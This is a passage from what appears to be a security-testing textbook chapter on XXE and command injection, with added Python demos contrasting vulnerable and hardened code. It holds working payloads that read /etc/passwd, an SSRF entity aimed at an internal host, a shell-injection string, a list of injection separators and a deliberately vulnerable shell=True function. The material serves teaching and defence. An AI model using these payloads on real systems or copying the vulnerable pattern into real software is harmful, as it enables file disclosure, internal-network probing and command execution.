    248 | Chapter 8: Web Application Testing


    Example 8-1. XML external entity sample (tags reconstructed from the garbled listing; foo is a placeholder root element name)
    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >
    ]>
    <foo>&xxe;</foo>
    The external entity is named xxe, and in this case its SYSTEM identifier points at a
    local file: when the parser expands &xxe;, it reads /etc/passwd and substitutes the
    file's contents into the document, and if the application reflects the parsed value,
    those contents come back in the response. Of course, /etc/passwd will give you only
    a list of users. The password hashes live in /etc/shadow, which the web server user
    usually cannot read. File disclosure isn't the only thing you can do with an XXE
    attack, though. Instead of a reference to a file, the entity can reference a remote
    URL. This makes the outside-facing server fetch, and possibly return, content from a
    host that is reachable only on the inside of the network, which is a form of
    server-side request forgery. The XML would look the same except for the !ENTITY
    line. Example 8-2 shows the !ENTITY line referring to a web server with a private
    address that would not be routable over the internet.
    Example 8-2. XML external entity for internal URL (tags reconstructed; same document as Example 8-1 apart from the !ENTITY line)
    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [
    <!ENTITY xxe SYSTEM "https://192.168.1.1/private" >
    ]>
    <foo>&xxe;</foo>
    One other attack along the same lines is to reference a file that never ends. On a
    Unix-like operating system, /dev/urandom never returns an end-of-file marker, because
    it just keeps producing random bytes, and pseudodevices such as /dev/zero and
    /dev/random behave the same way. A parser that tries to read such an entity to
    completion will consume CPU and memory until the web server or the application stops
    functioning properly, causing a denial of service. Whether any of these attacks work
    depends on the parser: many modern XML libraries disable external entity resolution
    by default, so the first thing to establish in a test is whether the application's
    parser resolves external entities at all.
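    The following is an added example, not code from the book: it takes the document of Examples 8-1 and 8-2 and runs it through Python's standard-library SAX parser, first with external general entities enabled (the misconfiguration XXE relies on) and then disabled (the hardened setting, and Python's default since 3.7.1). The back-end language, the helper names, the foo root element and the secret file, which the example writes itself in place of /etc/passwd so that it runs offline, are assumptions of this example.

```python
"""XXE in runnable form: Example 8-1's document fed to Python's stdlib SAX
parser with external entity loading enabled (vulnerable) and disabled
(hardened). The secret file is created by the example itself; nothing here
is the book's code."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


def build_xxe_document(system_id: str) -> bytes:
    """Same shape as Examples 8-1 and 8-2: an external general entity named
    xxe whose SYSTEM identifier is the attacker's choice (a file: URL for
    disclosure, an internal http(s) URL for the SSRF variant). 'foo' is a
    placeholder root element name."""
    doc = (
        '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
        "<!DOCTYPE foo [\n"
        f'<!ENTITY xxe SYSTEM "{system_id}">\n'
        "]>\n"
        "<foo>&xxe;</foo>\n"
    )
    return doc.encode("iso-8859-1")


class _TextCollector(ContentHandler):
    """Collects character data, i.e. whatever &xxe; expanded to."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_document(xml_bytes: bytes, resolve_external: bool) -> str:
    """Parse the document and return the text inside the root element.
    resolve_external=True is the setting that makes the parser fetch the
    SYSTEM identifier; False is the hardened configuration."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def demo_file_disclosure() -> tuple:
    """Write a secret file (constructed stand-in for /etc/passwd), then parse
    the XXE document with both settings. Returns (leaked, hardened)."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = os.path.join(tmp, "secret.txt")
        with open(secret_path, "w") as fh:
            fh.write("SECRET-CONTENT")
        doc = build_xxe_document("file://" + secret_path)
        leaked = parse_document(doc, resolve_external=True)
        hardened = parse_document(doc, resolve_external=False)
    return leaked, hardened


if __name__ == "__main__":
    leaked, hardened = demo_file_disclosure()
    print("external entities enabled :", repr(leaked))
    print("external entities disabled:", repr(hardened))
    # The SSRF variant of Example 8-2 is built the same way; it is not
    # fetched here because 192.168.1.1 is not reachable from this example.
    print(build_xxe_document("https://192.168.1.1/private").decode())
```

    With external entities enabled the root element's text is the file's contents; with them disabled the reference expands to nothing and the secret never leaves the host. The test for a real application is the same in spirit: submit a document like this with an identifier you control and see whether its contents, or a request for the URL, come back.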
    Command Injection
    Command injection attacks target the operating system of the web server. With this
    type of attack, someone takes advantage of a form field whose value is passed to the
    operating system. If you have a web page that offers some control of the underlying
    device or provides a service built on a system utility (for example, doing a whois
    lookup), you may be able to send in an operating system command. Theoretically, if a
    page used the whois command from the operating system, the application would do
    something like a system() call, passing in whois followed by what should be a domain
    name or IP address. Because system() hands the whole string to a shell (/bin/sh -c
    on Unix-like systems), anything the shell treats as special in that string is
    interpreted by the shell rather than passed to whois.
    With this sort of attack, it's helpful to know the underlying operating system so you
    can pass in appropriate commands and use the right command delimiter. Let's assume
    that it's a Linux system. The Linux shell uses ; (semicolon) as a command delimiter,
    so we could pass "wubble.com; cat /etc/passwd" into the form field: whois runs
    against wubble.com, and then cat /etc/passwd runs as a second command. Other
    separators the shell honors work as well, such as &&, |, and a newline, and $( ) or
    backticks embed a command inside the argument itself; on Windows, & and | are the
    usual delimiters for cmd.exe.
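    An added example, not the book's code, that turns the whois scenario into something you can run: echo lookup: stands in for the whois binary so it works offline, id is the injected marker command, and the function names and the hostname allowlist are assumptions of this example. It shows the vulnerable system()-style call, the argv-list call that keeps the shell out of the picture, an allowlist on top of that, and the shell separators a tester tries beyond the semicolon.

```python
"""Command injection through a whois-style lookup, runnable offline.
`echo lookup:` is a constructed stand-in for the real whois binary; none of
this is the book's code."""
import re
import shlex
import subprocess

LOOKUP_CMD = "echo lookup:"   # stand-in for "whois" (assumption)


def vulnerable_lookup(target: str) -> str:
    """The vulnerable pattern: the form value is concatenated into a command
    string and handed to the shell. shell=True behaves like C's system(),
    i.e. /bin/sh -c "<cmd>", so every metacharacter in `target` is
    interpreted by the shell."""
    cmd = f"{LOOKUP_CMD} {target}"
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


def argv_lookup(target: str) -> str:
    """First hardening layer: pass an argv list, never a shell string. No
    shell runs, so ';' and friends reach the program as plain characters
    inside a single argument."""
    argv = shlex.split(LOOKUP_CMD) + [target]
    result = subprocess.run(argv, capture_output=True, text=True)
    return result.stdout


# Hostnames and dotted IPv4 addresses only. No leading '-', so the value
# cannot be mistaken for an option flag by the lookup program.
TARGET_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?")


def is_valid_target(target: str) -> bool:
    return TARGET_RE.fullmatch(target) is not None


def safe_lookup(target: str) -> str:
    """Second layer: allowlist the input before it goes near a process."""
    if not is_valid_target(target):
        raise ValueError(f"rejected lookup target: {target!r}")
    return argv_lookup(target)


def injection_payloads(domain: str, marker: str = "id") -> dict:
    """Separators a tester tries when the back end is a Unix shell. The text
    uses ';'; the rest are just as useful. '||' only runs the right-hand
    side when the left-hand command fails, so it is listed for completeness
    but will not fire when the lookup itself succeeds."""
    return {
        "semicolon": f"{domain}; {marker}",
        "and":       f"{domain} && {marker}",
        "pipe":      f"{domain} | {marker}",
        "newline":   f"{domain}\n{marker}",
        "subshell":  f"{domain} $({marker})",
        "backtick":  f"{domain} `{marker}`",
        "or":        f"{domain} || {marker}",
    }


if __name__ == "__main__":
    payload = "wubble.com; cat /etc/passwd"      # the text's own example
    print("--- shell string (vulnerable) ---")
    print(vulnerable_lookup(payload))
    print("--- argv list: payload is one literal argument ---")
    print(argv_lookup(payload))
    print("--- allowlisted ---")
    try:
        safe_lookup(payload)
    except ValueError as exc:
        print(exc)
```

    Run as a script, the first call prints the lookup line followed by the contents of /etc/passwd, the second prints the payload back as literal text, and the third rejects it before any process starts. The argv form alone already defeats the separators, but without the allowlist an attacker can still hand the lookup program an argument beginning with a dash and drive its options, which is why both layers are kept.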
